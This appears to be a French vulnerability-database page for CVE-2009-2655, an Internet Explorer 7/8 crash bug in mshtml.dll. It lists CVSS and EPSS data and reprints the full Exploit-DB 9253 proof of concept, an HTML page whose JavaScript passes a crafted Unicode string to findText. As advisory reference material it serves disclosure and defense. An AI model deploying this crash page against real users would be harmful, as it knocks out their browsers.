CVE-2009-2655 : Détail

CVE-2009-2655

A03-Injection
39.18%V4
Network
2009-08-03
12h00 +00:00
2017-09-18
10h57 +00:00
Notifications pour un CVE
Restez informé de toutes modifications pour un CVE spécifique.
Gestion des notifications

Descriptions du CVE

mshtml.dll in Microsoft Internet Explorer 7 and 8 on Windows XP SP3 allows remote attackers to cause a denial of service (application crash) by calling the JavaScript findText method with a crafted Unicode string in the first argument, and only one additional argument, as demonstrated by a second argument of -1.

Informations du CVE

Faiblesses connexes

CWE-ID Nom de la faiblesse Source
CWE-20 Improper Input Validation
The product receives input or data, but it does not validate or incorrectly validates that the input has the properties that are required to process the data safely and correctly.

Métriques

Métriques Score Gravité CVSS Vecteur Source
V2 4.3 AV:N/AC:M/Au:N/C:N/I:N/A:P nvd@nist.gov

EPSS

EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.

Score EPSS

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Percentile EPSS

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

Informations sur l'Exploit

Exploit Database EDB-ID : 9253

Date de publication : 2009-07-23 22h00 +00:00
Auteur : Hong10
EDB Vérifié : Yes

<meta http-equiv="Context-Type" content="text/html; charset=US-ASCII"> <!-- Contact:h0n9t3n@gmail.com,AmesianX@gmail.com Title: MS Internet Explorer findText Unicode Parsing error Vulnerability (mshtml.dll) Bug discovered: Hong10 PoC code: AmesianX & Hong10 Critical: low Impact: MS Internet Explorer 7/8 Crash Where: From remote Tested Operating System: Windows XP SP3 FULL PATCHED (Korean Language) Solution: I don't know.. Description: The following bug was tested on the latest version of Internet Explorer 7/8. by research team NSHC --> <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><head><title>IE findText crash</title> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"></head><body> <input type="button" value="exploit" onclick="do_crash();"> Hit the button after ie7/8 crash.. <script> function do_crash() { var o1=document.createElement("input"); o1.type="text"; //or password o1.id="powerhacker"; o1.value="AAAA"; document.body.appendChild(o1); var r= o1.createTextRange(); r.findText(unescape("%u4141%u4141%u4141%u4141%u4242%u4242%u4242%u4242%u4343%u4343%u4343%u4343%u4444%u4444%u4444%u4444%u4545%u4545%u4545%u4545"),-1); //maybe string length allocated stack but over length allocated heap memory //r.findText(unescape("%u4141%u4141%u4141%u4141%u4242%u4242%u4242%u4242%u4343%u4343%u4343%u4343%u4444%u4444%u4444%u4444%u4545%u4545%u4545%u4545"),-1,131072); //this code is no crash becase 3 parameter } </script> </body></html> <html><body></body></html> # milw0rm.com [2009-07-24]

Products Mentioned

Configuraton 0

Microsoft>>Internet_explorer >> Version 7

Microsoft>>Internet_explorer >> Version 8

Microsoft>>Windows_xp >> Version -

Références

http://www.securityfocus.com/bid/35799
Tags : vdb-entry, x_refsource_BID
http://www.exploit-db.com/exploits/9253
Tags : exploit, x_refsource_EXPLOIT-DB